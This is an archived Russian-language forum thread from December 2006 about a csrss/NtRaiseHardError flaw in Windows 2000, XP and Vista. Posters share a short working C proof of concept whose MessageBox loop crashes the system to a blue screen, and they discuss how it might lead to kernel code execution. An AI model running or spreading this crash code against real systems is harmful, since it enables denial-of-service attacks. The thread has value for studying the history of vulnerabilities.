PDA

Просмотр полной версии : MS подтвердила существование уязвимости в подcистеме csrss


KPOT_f!nd
25.12.2006, 03:14
В блоге Microsoft Security Response Center (http://blogs.technet.com/msrc/archive/2006/12/22/new-report-of-a-windows-vulnerability.aspx)
появилось подтверждение существования ошибки в Client Server Run-Time Subsystem, которая может привести к повышению локальных привилегий. Код, запарывающий память csrss, что в большинстве случаев выкидывает систему (от win2k до висты) на синий экран, использует штатную функцию WinAPI MessageBox. Пока в Microsoft сохраняют спокойствие, продолжая считать Висту самой безопасной современной платформой и отслеживая ситуацию, связанную с этой уязвимостью.
Источник: www.mazafaka.ru

_Great_
25.12.2006, 08:13
Код, запарывающий память csrss, что в большинстве случаев выкидывает систему (от win2k до висты) на синий экран, использует штатную функцию WinAPI MessageBox.
да епт при чем тут месажбокс. система вылетает на уровне ядра в функции NtRaiseHardError, которая неккоректно обрабатывает строку, начинающуюся на \??\.

продолжая считать Висту самой безопасной современной платформой
гыгы, ну-ну...

-=lebed=-
25.12.2006, 11:56
А вот и сам сплоит:

#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
{
MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

Кто затестил?
Взят отсюда http://www.security.nnov.ru
Ссылка по теме: http://www.kuban.ru/forum_new/forum2/files/19124.html

Talisman
25.12.2006, 12:35
хы... как юнит скомпилил в бдске - нифига винда не вылетает)
приду вечером, надеюсь добью багсу...

_Great_
25.12.2006, 14:14
я тестил, работает. сплоит можно сократить до

#include <windows.h>

int main(void){
int i;
char bug [] ="\\??\\";
for(i = 0; i < 10; i ++) MessageBox(0, bug, bug, MB_SERVICE_NOTIFICATION);
}

Работает на ура.
MessageBox при флаге MB_SERVICE_NOTIFICATION вызывает на самом деле ntdll!NtRaiseHardError для показа окошка, а она - переходник для функции ядра ntoskrnl!NtRaiseHardError.
В ней идет обработка первых символов \??\ весьма причудливым образом.
Как написано в письме, отосланном в микрософт, ]it looks like some
"debug" feature not cleaned out in final release and it seems to
exploitable to code execution at kernel level.
Вот такие пироги. Если повезет, можно накатать сплоит для выполнения кода в режиме ядра, последствия чего пояснять не стоит.

Уязвимые версии - 2000 (все сп), XP ( все сп), Vista.
Однако микрософт продолжает считать Висту защищенной. Ну-ну

Вот такие пироги, в кратце)


UPD: Кусок кода NtRaiseHardError:
} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 4)) {
strcpy( asLocal.Buffer, asLocal.Buffer+4 );
по документации strcpy: The behavior of strcpy is undefined if the source and destination strings overlap.

karabym
26.12.2006, 09:59
Хехе Билли как всегда слепо верит что от его творения неcмогут отказаться :)